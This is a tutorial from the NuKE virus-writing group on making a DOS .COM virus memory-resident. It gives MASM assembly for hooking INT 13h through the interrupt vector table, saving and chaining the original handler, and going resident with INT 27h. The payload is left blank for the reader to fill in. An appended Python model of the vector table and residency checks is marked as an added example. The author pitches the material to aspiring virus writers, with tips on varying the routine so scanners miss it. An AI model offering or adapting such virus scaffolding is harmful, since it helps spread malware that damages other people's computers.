TSR .COM infection
By Rock Steady/NuKE
There are several ways to construct a virus. Broadly, you have those that are RAM-resident, better known as TSR (terminate-and-stay-resident) programs, and those that are not.
A TSR virus loads itself into memory and can then infect any program the computer executes, as my AmiLiA virus does with every EXE and COM file that is run. A TSR virus therefore spreads much faster than a non-resident one. A non-resident virus infects only when an infected program is run, so it starts slowly; once it has been on a system for a few weeks it will have worked its way through most of the files there. A TSR virus usually infects only files that are executed, so files that are never run stay clean, but in the first hour alone it reaches far more files than a non-resident virus, easily ten to one. That advantage is why most programmers write TSR viruses. I will explain a simple method of making your program resident, and it is flexible enough that you can vary it so nobody can say you `stole' it from Rock Steady.
I will explain the process of intercepting an interrupt and hooking your virus (or any program) to an interrupt of your choice. The same basic method is used by all the Jerusalem strains and several of the Vacsina strains; close to a hundred viruses go resident this simple way, with the INT 27h TSR call. My explaining the method does not mean your virus can be detected because of these TSR routines: signature scanners look for the exact byte patterns of known code, and the routines in my own viruses are ones I developed alone and will release in future virii. There is an unlimited number of ways to write a TSR, so beginners should develop their own routine rather than copy this one. Be aware, though, that heuristic scanners and behaviour monitors look for the act itself (a program setting a disk interrupt vector with INT 21h AH=25h, or a vector that points into conventional memory instead of ROM or DOS), and those will flag any variant of it. The same routine can also be used in several other utilities, not just viruses.
Beginning...
First we must intercept an interrupt. Say we want our virus to activate every time the disk is used: we would hook INT 13h or INT 21h. INT 13h is the BIOS disk service and fires for every low-level sector read or write. INT 21h is the DOS service interrupt and fires whenever a program calls DOS, which includes every file open, close and execute, and things like a "DIR" at the prompt. You could even hook INT 10h so your code runs whenever the screen is written, or hook INT 17h, the printer service. Whatever seems to `enlighten' you; since we live in a distressed world I won't bother with why we shouldn't hook just any interrupt.
Interrupts use a vector table at the very bottom of memory to find the routine to call. The table is RAM, not ROM: it starts at 0000:0000 and holds 256 entries of 4 bytes each, so the entry for interrupt n is at offset n*4 and contains the handler's offset word followed by its segment word. The vector for INT 21h is therefore at 0000:0084h and the one for INT 13h at 0000:004Ch. We can change these entries so the vector points to our virus: every time the interrupt is raised the CPU reads the table, and the table sends it to our code rather than to the ROM BIOS or DOS routine. But what we MUST do FIRST is save the original vector somewhere in our own code, so that after the virus has done its work it can call the original routine.
Say we hook our virus to INT 13h, which handles all disk activity at the sector level. When a program (or DOS itself) needs to read something from the disk it issues INT 13h expecting the BIOS routine. Instead the vector now leads to our virus: the virus runs, does what it has to do, and then calls the original INT 13h routine at the address we saved. To the caller it looks like an ordinary INT call to the ROM BIOS.
;----------------------------------------------------------------
; Sample program showing how to hook your virus to an interrupt.
; MASM/TASM syntax, assembled as a COM file.
;----------------------------------------------------------------
Code Segment
Assume cs:code,ss:code,ds:code,es:code
Org 100h ; COM file: CS=DS=ES=SS=PSP segment, code starts at 100h
Begin: JMP Bios_Routine ; 3-byte near jump into the installer
NOP ; This is just a cheap .COM host that the
NOP ; virus is attached to. A real infection
NOP ; overwrites the host's first 3 bytes with the
INT 20h ; JMP, so keep a copy of them in your virus.
OLD_ROM_INT DD ? ; Doubleword (offset word, then segment) holding the ORIGINAL INT 13h vector
;----------------------------------------------------------------
; This runs on every INT 13h: it calls the virus, then the OLD ROM routine
;----------------------------------------------------------------
Virus_Codes PROC FAR
Assume cs:code, ds:nothing ; We arrive with the CALLER's DS and SS, so our own data needs cs:
pushf ; Every time the interrupt fires this is what
push ax ; happens: save the caller's registers and flags,
push bx ; run our virus, restore everything, then run the
push cx ; OLD ROM BIOS routine that was supposed to run
push dx ; in the first place.
push si ;
push di ; NOTE: INT 13h takes its parameters in AX, BX, CX,
push bp ; DX and ES:BX, so EVERY register the virus may
push ds ; touch must be saved here, or the original call
push es ; below is made with garbage arguments.
call The_Virus
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
pushf ; This `pushf' is NEEDED: the far CALL below must look
call dword ptr cs:[OLD_ROM_INT] ; like an INT to the old routine, which returns with IRET.
ret 2 ; RETF 2: pop the caller's CS:IP and DISCARD the flags the INT pushed,
; so the carry flag (INT 13h's error status) as set by the old routine reaches
; the caller. A plain RET would leave 2 bytes on the stack; IRET would overwrite CF.
Virus_Codes ENDP
;----------------------------------------------------------------
; Put the REAL virus code here...
;----------------------------------------------------------------
The_Virus PROC NEAR
; Put your OWN virus code here. Just make it
; compatible with the code around it: it runs
; with the caller's DS, so use cs: overrides for
; our own data. Try to make it small; it takes
; up the user's memory for as long as the
; machine is up.
;
; NOTE: infect files only when they are EXECUTED,
; not on every use of the interrupt. Get it?
RET
The_Virus ENDP
;---------------------------------------------------------------
; Installer: saves the OLD INT 13h vector in our virus and points
; the vector at Virus_Codes, which calls the OLD routine after the
; virus has run. So remember to SAVE it first.
;---------------------------------------------------------------
Bios_Routine PROC NEAR
Assume cs:code,ds:code ; At COM start-up DS = CS, so plain data references work here
mov ah,35h ; DOS "get interrupt vector": AL = interrupt number,
mov al,13h ; returns the current handler address in ES:BX
int 21h
mov word ptr OLD_ROM_INT,bx ; Save the offset (BX) ...
mov word ptr OLD_ROM_INT[2],es ; ... and the segment (ES) in our doubleword
; Here you SHOULD check whether we are already resident before installing
; a second copy. The vector entry itself lives in the table at 0000:(int# x 4):
; 0000:004Ch for INT 13h, 0000:0084h for INT 21h. The simple check is whether
; ES:BX still points into the ROM BIOS; if not, something has hooked INT 13h
; and it `should' be us. This is NOT always the best way: any other program
; that hooks the same interrupt (a disk cache, say) makes the virus believe it
; is already resident, and it never installs. The usual fix is an "are you
; there?" call: reserve a subfunction number the BIOS does not use, have
; Virus_Codes answer it with a signature value instead of chaining, and have
; this installer call it and look for that value. Though this source is NOT
; for the professional virus programmer like myself, because WE KNOW, but for
; those that are half way there...
mov ah,25h ; DOS "set interrupt vector": AL = interrupt number,
mov al,13h ; DS:DX = new handler address
mov dx,offset Virus_Codes ; Set INT 13h to point to Virus_Codes
int 21h
mov dx,offset Bios_Routine ; Bytes to keep resident: everything before this installer
int 27h ; Terminate and stay resident (the host's INT 20h is never reached)
Bios_Routine ENDP
; Anything after this point will not be memory resident, because the
; resident portion ends at the start of the Bios_Routine procedure.
Code ENDS
END Begin
;----------------------------- EnD ----------------------------------
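The following is an added example, not code from the original article: a small Python model of the real-mode interrupt vector table and of the installer/handler above, written so the mechanics can be checked without a DOS box. It covers the vector-table arithmetic from the explanation of INT 13h/INT 21h hooking (entry = interrupt number * 4, offset word then segment word), the save-old / point-at-us / chain-to-old sequence, and the residency check discussed in the comments of Bios_Routine, including the case the article warns about (another program hooked first) and one it does not show (another program hooks after us). ROM_SEG/ROM_OFF, TSR_SEG/TSR_OFF, the cache and "later" TSR addresses, and the AYT_FUNC/AYT_REPLY values are all made up for the model.

```python
"""Python model of the IVT and of the INT 13h hook above (added example, not
original code). Every segment:offset constant below is assumed for the model."""

ROM_SEG, ROM_OFF = 0xF000, 0xEC59   # assumed address of the ROM BIOS INT 13h entry
TSR_SEG, TSR_OFF = 0x0100, 0x011C   # assumed address of Virus_Codes once resident
AYT_FUNC, AYT_REPLY = 0xFE, 0x1234  # assumed "are you there?" subfunction and answer


def ivt_entry(int_no):
    """Linear address of the 4-byte IVT slot for INT int_no (table base 0000:0000)."""
    if not 0 <= int_no <= 0xFF:
        raise ValueError("interrupt number must be 0..FFh")
    return int_no * 4


def linear(seg, off):
    """Real-mode segment:offset -> 20-bit linear address."""
    return ((seg << 4) + off) & 0xFFFFF


class Machine:
    """Just enough of a PC to hook an interrupt: an IVT plus handlers keyed by address."""

    def __init__(self):
        self.ivt = bytearray(256 * 4)
        self.handlers = {}      # (seg, off) -> callable(machine, regs) -> regs
        self.log = []           # who saw each INT 13h request, in order

    def set_vector(self, int_no, seg, off, handler):    # what INT 21h AH=25h does
        a = ivt_entry(int_no)
        self.ivt[a:a + 2] = off.to_bytes(2, "little")      # offset word first,
        self.ivt[a + 2:a + 4] = seg.to_bytes(2, "little")  # then segment word
        self.handlers[(seg, off)] = handler

    def get_vector(self, int_no):                       # what INT 21h AH=35h returns in ES:BX
        a = ivt_entry(int_no)
        return (int.from_bytes(self.ivt[a + 2:a + 4], "little"),
                int.from_bytes(self.ivt[a:a + 2], "little"))

    def int_call(self, int_no, regs):
        """'INT n': fetch the vector and run whatever it points at, on a copy of the registers."""
        return self.handlers[self.get_vector(int_no)](self, dict(regs))


def rom_int13(m, regs):
    """Stand-in for the ROM BIOS disk service: log the request and return CF=0."""
    m.log.append(("bios", regs["ah"], regs["dl"]))
    return dict(regs, cf=0)


def hook(m, int_no, seg, off, name, answers_ayt=False):
    """Bios_Routine in Python: save the old vector (OLD_ROM_INT), then point INT n at us.
    The handler does what Virus_Codes does: run our code with the caller's registers
    preserved, then chain to the saved vector (the pushf / call OLD_ROM_INT)."""
    old = m.get_vector(int_no)

    def handler(m, regs):
        if answers_ayt and regs["ah"] == AYT_FUNC:      # installation check: answer, don't chain
            return dict(regs, ax=AYT_REPLY, cf=0)
        m.log.append((name, regs["ah"]))                # The_Virus would do its work here
        return m.handlers[old](m, dict(regs))           # registers restored, then old routine
    m.set_vector(int_no, seg, off, handler)
    return old


def check_vector_changed(m):
    """The article's suggested check: 'does INT 13h no longer point into the ROM BIOS?'"""
    return m.get_vector(0x13)[0] != ROM_SEG


def check_points_at_us(m):
    """Stricter variant: 'does INT 13h point exactly at our handler?'"""
    return m.get_vector(0x13) == (TSR_SEG, TSR_OFF)


def check_are_you_there(m):
    """Call the chain with the reserved subfunction; only our handler knows the answer."""
    return m.int_call(0x13, {"ah": AYT_FUNC, "dl": 0, "ax": 0}).get("ax") == AYT_REPLY


def demo():
    """Three moments: another TSR hooked first, then us, then a third TSR hooking after us."""
    m = Machine()
    m.set_vector(0x13, ROM_SEG, ROM_OFF, rom_int13)
    hook(m, 0x13, 0x2000, 0x0010, "cache")              # e.g. a disk cache, resident before us
    before = (check_vector_changed(m), check_points_at_us(m), check_are_you_there(m))
    old = hook(m, 0x13, TSR_SEG, TSR_OFF, "virus", answers_ayt=True)
    m.int_call(0x13, {"ah": 0x02, "dl": 0x80, "ax": 0x0201})   # a sector read walks the whole chain
    installed = (check_vector_changed(m), check_points_at_us(m), check_are_you_there(m))
    hook(m, 0x13, 0x3000, 0x0020, "later")              # something hooks INT 13h after us
    later = (check_vector_changed(m), check_points_at_us(m), check_are_you_there(m))
    return old, before, installed, later, m.log
```

Running demo() shows the two failure modes side by side: with only the cache resident, the "vector changed" check already reports True (the virus would believe it is resident and never install), and once a third program hooks after the virus, the "points at us" check reports False (a second copy would be installed), while the signature call answers correctly in every state because every well-behaved hook chains the request down to whoever recognises it.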
Simple, isn't it? I tried to make this as simple as possible, and I hope I didn't lose you. This is the basic routine that a great many TSR virii use. See what it gives you....
Rock Steady
NukE / Viral Development Researcher
-PeAcE-